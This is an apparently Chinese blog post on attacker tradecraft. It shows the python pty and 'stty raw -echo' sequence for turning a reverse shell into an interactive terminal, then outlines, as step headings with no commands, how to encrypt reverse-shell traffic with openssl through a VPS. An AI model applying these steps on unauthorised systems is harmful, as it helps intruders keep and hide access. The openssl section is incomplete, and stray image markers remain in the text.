利用stty反弹一个交互shell & 加密反弹shell流量

stty 打印或更改terminal(终端)的设置
Linux stty 命令用法详解

流程:

先反弹一个shell出来
-w1206

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z

退出后在用stty修改tty通信
-w873

$ stty raw -echo #设置原始输入禁止回显,当您在键盘上输入时,并不出现在屏幕上
$ fg #返回shell中

-w756

-w650

$ reset
$ export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104

第一步,在VPS 上生成 SSL 证书的公钥/私钥对:

第二步,VPS 监听反弹 shell:

第三步,目标上用 openssl 加密反弹 shell 的流量:

第四步,VPS 上成功获取加密的哑 shell:

https://www.4hou.com/technology/6248.html
https://www.freebuf.com/vuls/211847.html

标签: none

添加新评论